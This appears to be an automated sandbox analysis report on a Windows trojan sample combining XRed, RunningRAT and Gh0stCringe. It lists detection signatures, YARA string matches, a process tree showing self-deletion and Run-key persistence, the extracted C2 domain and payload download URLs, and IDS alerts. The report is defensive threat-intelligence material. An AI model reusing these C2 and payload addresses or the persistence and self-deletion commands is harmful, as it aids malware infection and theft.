Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
blq.exe

Overview

General Information

Sample name:blq.exe
Analysis ID:1580529
MD5:6153a06b74491bacb664bf142b598c69
SHA1:dade36a11a568e3b0b5f3e7fd44b566182702534
SHA256:0b510380e52b3c97e7a2f227eb9ecda6a194885da74fac6630f1eb7d5ee6091f
Tags:DarkCometexeuser-sicehicetf
Infos:

Detection

Gh0stCringe, RunningRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gh0stCringe
Yara detected RunningRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • blq.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\blq.exe" MD5: 6153A06B74491BACB664BF142B598C69)
    • ._cache_blq.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\._cache_blq.exe" MD5: 2C8E6B45F0113B45F9187B60DF114FEF)
      • cmd.exe (PID: 7804 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 7848 cmdline: ping 127.0.0.1 -n 1 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • Synaptics.exe (PID: 7644 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 64C0A5B375F1AB0C44808320D5AF9E84)
      • WerFault.exe (PID: 7032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7636 cmdline: C:\Windows\SysWOW64\svchost.exe -k "encvbk" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • svchost.exe (PID: 7664 cmdline: C:\Windows\SysWOW64\svchost.exe -k "encvbk" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • encvbk.exe (PID: 8056 cmdline: C:\Windows\system32\encvbk.exe "c:\program files (x86)\6795234.dll",MainThread MD5: 889B99C52A60DD49227C5E485A016679)
  • EXCEL.EXE (PID: 7704 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 1900 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • svchost.exe (PID: 7984 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Synaptics.exe (PID: 7636 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 64C0A5B375F1AB0C44808320D5AF9E84)
  • svchost.exe (PID: 6808 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6952 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7644 -ip 7644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7356 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7644 -ip 7644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7572 cmdline: C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Running RATNJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server to change the address the trojan communicates with. The second DLL gathers information about the victim's system, including its operating system and driver and processor information. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-bugging techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
blq.exeJoeSecurity_XRedYara detected XRedJoe Security
    blq.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      blq.exeMALWARE_Win_RunningRATDetects RunningRATditekSHen
      • 0xbd1c4:$s1: %s%d.dll
      • 0xbd2d0:$s2: /c ping 127.0.0.1 -n
      • 0xbd2ea:$s3: del /f/q "%s"
      • 0xbd0dc:$s4: GUpdate
      • 0xbd2a0:$s5: %s\%d.bak
      • 0xbd1d9:$s6: "%s",MainThread
      • 0xbd1ec:$s7: rundll32.exe
      • 0xb769d:$rev1: emankcosteg
      • 0xb78c2:$rev3: daerhTniaM,"s%" s%
      • 0xb7c16:$rev4: s% etadpUllD,"s%" 23lldnuR
      • 0xb7d43:$rev5: ---DNE yromeMmorFdaoL
      • 0xb7d38:$rev6: eMnigulP
      • 0xb78b3:$rev7: exe.23lldnuR\
      • 0xb7bbc:$rev8: dnammoc\nepo\llehs\
      • 0xb7bf3:$rev8: dnammoc\nepo\llehs\
      • 0xb7d9d:$rev9: "s%" k- exe.tsohcvs\23metsyS\%%tooRmetsyS%
      • 0xb7643:$rev10: emanybtsohteg
      • 0xb7671:$rev11: tekcosesolc
      • 0xb767e:$rev12: tpokcostes
      • 0xb76a9:$rev13: emantsohteg

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\Desktop\._cache_blq.exeJoeSecurity_RunningRATYara detected RunningRATJoe Security
        C:\Users\user\Desktop\._cache_blq.exeGoldDragon_RunningRATDetects Running RAT from Gold Dragon reportFlorian Roth
        • 0x402f:$a1: emanybtsohteg
        • 0x405d:$a2: tekcosesolc
        • 0x4089:$a3: emankcosteg
        • 0x4095:$a4: emantsohteg
        • 0x406a:$a5: tpokcostes
        • 0x400e:$a6: putratSASW
        C:\Users\user\Desktop\._cache_blq.exeMALWARE_Win_RunningRATDetects RunningRATditekSHen
        • 0x9bb0:$s1: %s%d.dll
        • 0x9cbc:$s2: /c ping 127.0.0.1 -n
        • 0x9cd6:$s3: del /f/q "%s"
        • 0x9ac8:$s4: GUpdate
        • 0x9c8c:$s5: %s\%d.bak
        • 0x9bc5:$s6: "%s",MainThread
        • 0x9bd8:$s7: rundll32.exe
        • 0x4089:$rev1: emankcosteg
        • 0x42ae:$rev3: daerhTniaM,"s%" s%
        • 0x4602:$rev4: s% etadpUllD,"s%" 23lldnuR
        • 0x472f:$rev5: ---DNE yromeMmorFdaoL
        • 0x4724:$rev6: eMnigulP
        • 0x429f:$rev7: exe.23lldnuR\
        • 0x45a8:$rev8: dnammoc\nepo\llehs\
        • 0x45df:$rev8: dnammoc\nepo\llehs\
        • 0x4789:$rev9: "s%" k- exe.tsohcvs\23metsyS\%%tooRmetsyS%
        • 0x402f:$rev10: emanybtsohteg
        • 0x405d:$rev11: tekcosesolc
        • 0x406a:$rev12: tpokcostes
        • 0x4095:$rev13: emantsohteg
        C:\Program Files (x86)\6795234.dllJoeSecurity_Gh0stCringeYara detected Gh0stCringeJoe Security
          C:\Program Files (x86)\6795234.dllMALWARE_Win_RunningRATDetects RunningRATditekSHen
          • 0x5534:$s4: GUpdate
          • 0x514c:$s5: %s\%d.bak
          • 0x55e3:$s6: "%s",MainThread
          • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
          • 0x515c:$v2_2: LoadFromMemory END---
          • 0x51d0:$v2_3: hmProxy!= NULL
          • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
          • 0x5610:$v2_6: %d*%sMHz
          Click to see the 7 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmpJoeSecurity_Gh0stCringeYara detected Gh0stCringeJoe Security
            0000000A.00000002.4129317792.0000000010006000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_Gh0stCringeYara detected Gh0stCringeJoe Security
              00000001.00000000.1659507821.0000000000403000.00000008.00000001.01000000.00000005.sdmpJoeSecurity_RunningRATYara detected RunningRATJoe Security
                00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RunningRATYara detected RunningRATJoe Security
                    Click to see the 8 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    10.2.encvbk.exe.10000000.1.unpackJoeSecurity_Gh0stCringeYara detected Gh0stCringeJoe Security
                      10.2.encvbk.exe.10000000.1.unpackMALWARE_Win_RunningRATDetects RunningRATditekSHen
                      • 0x5534:$s4: GUpdate
                      • 0x514c:$s5: %s\%d.bak
                      • 0x55e3:$s6: "%s",MainThread
                      • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
                      • 0x515c:$v2_2: LoadFromMemory END---
                      • 0x51d0:$v2_3: hmProxy!= NULL
                      • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
                      • 0x5610:$v2_6: %d*%sMHz
                      1.2.._cache_blq.exe.4032a0.1.unpackJoeSecurity_Gh0stCringeYara detected Gh0stCringeJoe Security
                        1.2.._cache_blq.exe.4032a0.1.unpackMALWARE_Win_RunningRATDetects RunningRATditekSHen
                        • 0x5910:$s1: %s%d.dll
                        • 0x5a1c:$s2: /c ping 127.0.0.1 -n
                        • 0x5a36:$s3: del /f/q "%s"
                        • 0x4934:$s4: GUpdate
                        • 0x5828:$s4: GUpdate
                        • 0x454c:$s5: %s\%d.bak
                        • 0x59ec:$s5: %s\%d.bak
                        • 0x49e3:$s6: "%s",MainThread
                        • 0x5925:$s6: "%s",MainThread
                        • 0x5938:$s7: rundll32.exe
                        • 0x44ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
                        • 0x455c:$v2_2: LoadFromMemory END---
                        • 0x45d0:$v2_3: hmProxy!= NULL
                        • 0x4684:$v2_4: Rundll32 "%s",DllUpdate %s
                        • 0x4a10:$v2_6: %d*%sMHz
                        1.0.._cache_blq.exe.400000.0.unpackJoeSecurity_RunningRATYara detected RunningRATJoe Security
                          Click to see the 23 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\blq.exe, ProcessId: 7560, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                          Sigma detected: Office Macro File Creation
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7644, TargetFilename: C:\Users\user\AppData\Local\Temp\OslfsL4J.xlsm
                          Sigma detected: Windows Processes Suspicious Parent Directory
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe -k "encvbk", CommandLine: C:\Windows\SysWOW64\svchost.exe -k "encvbk", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe -k "encvbk", ProcessId: 7636, ProcessName: svchost.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-24T22:11:10.645213+010020448871A Network Trojan was detected192.168.2.449735142.250.181.14443TCP
                          2024-12-24T22:11:10.645236+010020448871A Network Trojan was detected192.168.2.449734142.250.181.14443TCP
                          2024-12-24T22:11:13.240931+010020448871A Network Trojan was detected192.168.2.449745142.250.181.14443TCP
                          2024-12-24T22:11:13.244835+010020448871A Network Trojan was detected192.168.2.449744142.250.181.14443TCP
                          2024-12-24T22:11:17.493276+010020448871A Network Trojan was detected192.168.2.449759142.250.181.14443TCP
                          2024-12-24T22:11:17.493467+010020448871A Network Trojan was detected192.168.2.449758142.250.181.14443TCP
                          2024-12-24T22:11:20.152684+010020448871A Network Trojan was detected192.168.2.449764142.250.181.14443TCP
                          2024-12-24T22:11:20.259535+010020448871A Network Trojan was detected192.168.2.449765142.250.181.14443TCP
                          2024-12-24T22:11:24.300966+010020448871A Network Trojan was detected192.168.2.449781142.250.181.14443TCP
                          2024-12-24T22:11:24.305134+010020448871A Network Trojan was detected192.168.2.449780142.250.181.14443TCP
                          2024-12-24T22:11:26.893764+010020448871A Network Trojan was detected192.168.2.449784142.250.181.14443TCP
                          2024-12-24T22:11:27.019999+010020448871A Network Trojan was detected192.168.2.449787142.250.181.14443TCP
                          2024-12-24T22:11:29.925816+010020448871A Network Trojan was detected192.168.2.449796142.250.181.14443TCP
                          2024-12-24T22:11:29.934623+010020448871A Network Trojan was detected192.168.2.449797142.250.181.14443TCP
                          2024-12-24T22:11:34.016732+010020448871A Network Trojan was detected192.168.2.449808142.250.181.14443TCP
                          2024-12-24T22:11:34.030277+010020448871A Network Trojan was detected192.168.2.449807142.250.181.14443TCP
                          2024-12-24T22:11:36.619576+010020448871A Network Trojan was detected192.168.2.449812142.250.181.14443TCP
                          2024-12-24T22:11:36.734168+010020448871A Network Trojan was detected192.168.2.449815142.250.181.14443TCP
                          2024-12-24T22:11:39.633528+010020448871A Network Trojan was detected192.168.2.449823142.250.181.14443TCP
                          2024-12-24T22:11:39.644248+010020448871A Network Trojan was detected192.168.2.449822142.250.181.14443TCP
                          2024-12-24T22:11:42.368794+010020448871A Network Trojan was detected192.168.2.449829142.250.181.14443TCP
                          2024-12-24T22:11:42.374305+010020448871A Network Trojan was detected192.168.2.449827142.250.181.14443TCP
                          2024-12-24T22:11:45.332367+010020448871A Network Trojan was detected192.168.2.449838142.250.181.14443TCP
                          2024-12-24T22:11:45.338699+010020448871A Network Trojan was detected192.168.2.449839142.250.181.14443TCP
                          2024-12-24T22:11:48.095679+010020448871A Network Trojan was detected192.168.2.449841142.250.181.14443TCP
                          2024-12-24T22:11:48.107763+010020448871A Network Trojan was detected192.168.2.449843142.250.181.14443TCP
                          2024-12-24T22:11:51.050695+010020448871A Network Trojan was detected192.168.2.449853142.250.181.14443TCP
                          2024-12-24T22:11:51.061874+010020448871A Network Trojan was detected192.168.2.449852142.250.181.14443TCP
                          2024-12-24T22:11:55.170346+010020448871A Network Trojan was detected192.168.2.449861142.250.181.14443TCP
                          2024-12-24T22:11:55.244824+010020448871A Network Trojan was detected192.168.2.449862142.250.181.14443TCP
                          2024-12-24T22:11:59.059409+010020448871A Network Trojan was detected192.168.2.449873142.250.181.14443TCP
                          2024-12-24T22:11:59.183233+010020448871A Network Trojan was detected192.168.2.449872142.250.181.14443TCP
                          2024-12-24T22:12:01.663647+010020448871A Network Trojan was detected192.168.2.449876142.250.181.14443TCP
                          2024-12-24T22:12:01.801209+010020448871A Network Trojan was detected192.168.2.449879142.250.181.14443TCP
                          2024-12-24T22:12:04.793241+010020448871A Network Trojan was detected192.168.2.449888142.250.181.14443TCP
                          2024-12-24T22:12:04.801184+010020448871A Network Trojan was detected192.168.2.449889142.250.181.14443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-24T22:11:10.644957+010028326171Malware Command and Control Activity Detected192.168.2.44974069.42.215.25280TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-24T22:11:04.821651+010028148971Malware Command and Control Activity Detected192.168.2.449733103.36.221.1958790TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: blq.exeAvira: detected
                          Source: blq.exeAvira: detected
                          Source: blq.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://xred.site50.net/syn/SUpdate.iniH))Avira URL Cloud: Label: malware
                          Source: http://xred.site50.net/syn/SUpdate.iniAvira URL Cloud: Label: malware
                          Source: http://xred.site50.net/syn/Synaptics.rarAvira URL Cloud: Label: malware
                          Source: http://xred.site50.net/syn/SSLLibrary.dlpAvira URL Cloud: Label: malware
                          Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Users\user\Desktop\._cache_blq.exeAvira: detection malicious, Label: TR/AD.Farfli.qqkhu
                          Source: C:\ProgramData\Synaptics\RCXAFD2.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\RCXAFD2.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\Program Files (x86)\6795234.dllAvira: detection malicious, Label: BDS/Backdoor.Gen7
                          Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/AD.Farfli.qqkhu
                          Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Found malware configuration
                          Source: blq.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                          Multi AV Scanner detection for dropped file
                          Source: C:\ProgramData\Synaptics\RCXAFD2.tmpReversingLabs: Detection: 100%
                          Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                          Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1ReversingLabs: Detection: 100%
                          Multi AV Scanner detection for submitted file
                          Source: blq.exeReversingLabs: Detection: 92%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
                          Machine Learning detection for dropped file
                          Source: C:\ProgramData\Synaptics\RCXAFD2.tmpJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\6795234.dllJoe Sandbox ML: detected
                          Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Joe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: blq.exeJoe Sandbox ML: detected
                          Source: blq.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49735 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49747 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49758 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49759 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49766 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49767 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49780 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49781 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49784 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49785 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49786 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49787 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49796 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49797 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49808 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49807 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49812 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49813 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49815 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49822 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49828 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49829 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49830 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49838 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49842 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49844 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49852 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49853 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49861 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49862 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49872 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49877 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49889 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49888 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49897 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49899 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49917 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49918 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49927 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49928 version: TLS 1.2
